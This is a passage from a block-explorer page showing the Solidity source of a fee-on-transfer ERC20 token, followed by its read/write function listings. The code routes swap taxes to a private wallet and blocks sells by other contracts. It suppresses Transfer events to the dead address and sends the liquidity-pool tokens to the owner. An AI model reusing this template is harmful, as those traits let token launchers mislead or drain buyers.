        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount = 0;
        if (
            from != owner() &&
            to != owner() &&
            from != address(this) &&
            to != address(this)
        ) {
            if (from != owner() && !inSwap) {
                taxAmount = amount
                    .mul((_buyCount > _reduceTaxAt) ? _finalTax : _initialTax)
                    .div(100);
            }

            if (
                from == uniswapV2Pair &&
                to != address(uniswapV2Router) &&
                !_feeExcluded[to] &&
                to != _taxWallet
            ) {
                _buyCount++;
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (
                to != address(this) && 
                !inSwap &&
                to == uniswapV2Pair &&
                from != _taxWallet &&
                swapEnabled &&
                _buyCount > _preventSwapBefore
            ) {
                require(!isContract(from), "ERC20: External call");
                if (block.number > lastSellBlock) {
                    sellCount = 0;
                }
                sellCount = sellCount + _getAmountOut(amount);
                if (contractTokenBalance > _taxSwap)
                    swapTokensForEth(_taxSwap > amount ? amount : _taxSwap);
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance >= 0) {
                    sendETHToFee(address(this).balance);
                }
            }
        }

        _balances[from] = _balances[from].sub(amount);
        _balances[to] = _balances[to].add(amount.sub(taxAmount));
        if (taxAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this), taxAmount);
        }
        if (to != _deadAddr) emit Transfer(from, to, amount.sub(taxAmount));
    }

    function sendETHToFee(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function enableTrading() external onlyOwner {
        require(!tradingOpen, "Trading is already open");
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(uniswapV2Router), _tTotal);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        swapEnabled = true;
        tradingOpen = true;
        IERC20(uniswapV2Pair).approve(
            address(uniswapV2Router),
            type(uint256).max
        );
    }

    function isContract(address _addr) internal view returns (bool) {
        uint256 size;
        assembly {
            size := extcodesize(_addr)
        }
        return size > 0;
    }

    function rescueEther() external onlyOwner {
        require(address(this).balance > 0);
        payable(_msgSender()).transfer(address(this).balance);
    }

    receive() external payable {}

    function setTaxWallet(address payable newWallet) external {
        require(_msgSender() == _taxWallet);
        _taxWallet = newWallet;
    }

    function _getAmountOut(uint256 amount) internal view returns (uint256) {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        uint256[] memory amountOuts = uniswapV2Router.getAmountsOut(
            amount,
            path
        );
        return amountOuts[1];
    }
}

Read Contract

_maxSwapThres 0xdc567d0a → uint256
_taxSwap 0x34376f3b → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 7 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
enableTrading 0x8a8c523c
No parameters
renounceOwnership 0x715018a6
No parameters
rescueEther 0x20969d07
No parameters
setTaxWallet 0xea414b28
address newWallet
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address